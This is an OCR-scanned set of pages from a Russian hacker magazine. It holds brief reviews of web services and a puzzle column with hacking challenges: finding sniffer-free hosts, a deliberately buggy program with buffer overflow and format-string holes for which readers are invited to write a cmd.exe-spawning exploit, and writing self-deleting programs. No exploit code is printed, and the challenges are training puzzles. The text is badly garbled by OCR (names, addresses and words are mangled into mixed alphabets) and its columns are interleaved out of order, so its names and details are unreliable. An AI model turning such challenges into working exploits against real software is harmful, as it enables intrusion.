Когда требуется набросать интерфейс для будущего приложения, я трижды 
думаю, прежде чем елозить карандашом по бумаге. Печальный опыт подска- 
зывает, что груда непонятных и никому не нужных черновиков —тот самый 
результат, который обычно из этого выходит. А ведь для проектирования 
сразу на компьютере даже не нужно прибегать к громоздким пакетам, можно 
делать все прямо в браузере. Сервис Репсіі Ргоіесі:, работающий в связке 
с плагином к Рігеіюх, позволитспроектировать в браузере интерфейс для 
разных ОС. Очень просто и без каких-либо ограничений! 




ЖИВОЙ ТВ ЭФИР МОСКВА 



І_ІѴЕ.РАІ_МТѴ.ВІІ 



Каждый раз, услышав классную песню по радио, я смотрю на часы. Для 
чего? Чтобы потом зайти на сайт Мозкѵаіпп и в собираемой им статистике 
посмотреть, что именно играло в этот момент на нужной радиостанции. При 
желании любой участокэфира можно даже воспроизвести. Ното радио, а 
существует л и та кой сервис для телевидения? Можно ли посмотреть феде- 
ральные каналы в прямом эфире, за глянуть в архи в? Теперь это возможно 
благодаря сервису Ііѵе.раітіѵ.ги. 



ВЕМЕМВЕВТНЕ МИК 



ѴѴѴѴѴѴ.ВЕМЕМВЕВТНЕМІІ_К.СОМ 



Не мнетебе объяснять, как сложно успеть все. Просто рецепт, чтобы успеть 
сделать как можно больше дел, незавалиться научебе, и при этом хорошо 
отдохнуть — вести списки дел или, как их сейчас по-модному называют, 
ТСЮО-листы. Всё просто: сначала составляешь план действий, а потом, 
по мере выполнения, методично вычеркиваешьсделанные пунктики. 
ПететЬегТЬе Міік один из самых продвинутых сервисов, которые может 
работать в офлайне и интегрироваться в другие проекты. Например, легко 



послать уведомление озадании по5М5, или привязать конкретное действие 




МЕЕВО 




ѴѴѴѴѴѴ. МЕЕВО. СОМ 



Что делать, если срочно нужно выйти ваську, а ничего кроме браузера нет 
под рукой? Ну, скажем, в гостинице или отеле, где естьтолько пресловутый 
Іпіегпеі Ехріогег. Ответ— использовать гшееЬо! Это обалденный клиент, ко- 
торый работает прямо в браузере и при этом поддерживает сразу 6 сетей: ісд 
іаЬЬег, доодіеіаік, гшбп, аіт.уабоо. Все проработано досконально и страни- 
ца теебо выглядит какобычное приложение. При этом не надо волноваться 
за сохранность паролей: теебо давно проверен временем. 
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рімііЕі 

ИВАН скляров ш 



ПРОЙДИСЬ ДЕБАГГЕРОМ ПО СВОИМ МОЗГАМ! 



ИВАН СКЛЯРОВ 

/ ХРІІ22І_Е@ВЕАІ_.ХАКЕР.КІІ / 



С этого номера мы возрождаем рубрику Х-риггІе, в которой будем тренировать 



твои мозги интересными головоломками.Присылай ответы на ящик 



хріі22Іе@геа1.хакер.ги и обязательно прикладывай полное обоснование реше- 
ний. Не стесняйся присылать ответы, даже если решишь только один паззл. 




НЮХАЧИ НА ПРОВОДЕ 

На рисунке показана схема локальной ЕЙіегпеІ- 
сети. На некоторых компьютерах в этой сети 
установлены пассивные сниферы (они имеют 
подпись«снифер»), которые прослушивают 
весь проходящий мимотрафик. 

Допустим, тебе необходимо вести незашифро- 
ванный обмен данными с компьютером «А». Оп- 
редели все компьютеры (их номера) в этой сети, 
с которых общение с компьютером «А» можно 
вести, не опасаясь, что трафик будет прослушан 
одним из сниферов. 

Разумеется, компьютеры, на которыхустанов- 
лены сниферы, использовать нельзя. 



«БАГАБАГА» 



На диске кжурналу (или на моем сайте ѵѵѵѵѵѵ. 
зкіѵа гой. ) ты найдешь простенькую, но очень 
бажную в плане безопасности программку под го- 
ворящим названием «ЬадаЬада». Эта программа 
содержит множественныеуязвимости перепол- 
нения буфера и форматной строки. На рисунке ты 
можешь видеть интерфейс ЬадаЬада: 




«ПРОГРАММА, 
УБИВАЮЩАЯ 
САМА СЕБЯ» 

Во времена ѴѴІп9х 
я знал, как минимум, 
несколько способов 
создания самоунич- 
тожающихся про- 
грамм, т. е. программ, 
которые после своего 
запуска сами удаляют 
себя с диска и из 
памяти. Однако в сов- 
ременных ѴѴІпбоѵѵз 







Раскодируй фразу из трех слов, показанную на рисунке: 



6НТХТФРФ2 НФФРКФЛРФ РКФАВФМЕНХ 



Подсказка: закодированная фраза на русском языке. 



ОТДАЙ ПАРОЛЬ 




На рисунке ты видишь шестнадцатеричный код файла РАЭЭѴѴОРй.СОМ 



Каквидишь, программа имеет единственное 
поле ввода, если попробовать в него что-нибудь 
ввести и нажать кнопку ОК, то содержимое поля 
ввода будет отображено в МеззадеВох. 

Твоя задача — обнаружить все уязвимости в этой 
программе и рассказать при каких условиях они 
воз ника ют. 

Конечно, ты можешь просто подставлять различ- 
ные строки в поле ввода в надежде обнаружить 
уязвимости, но, наверное, самое правильное 
воспользоваться дизассемблером. Однако 
должен сказать, здесьтебя ждет небольшое 
препятствие — файл упакован. 

Кто сможет написать эксплоит, запускающий 
оболочку системы стсі.ехехотя бы для одной 
уязвимости, будет отмечен особо. 



практически все эти 
способы не работают. 
Сможешьлиты напи- 
сать самоуничтожа- 
ющуюся программу 
и прислать мне ее 
исходный код? Язык 
программирования 
не имеетзначения. 
Операционная систе- 
ма не ниже ѴѴІпсІоѵѵз 
ХР5Р2. 

Также приветству- 
ются самоуничтожа- 
ющиеся программы 
под Ыпих/ВБО. 
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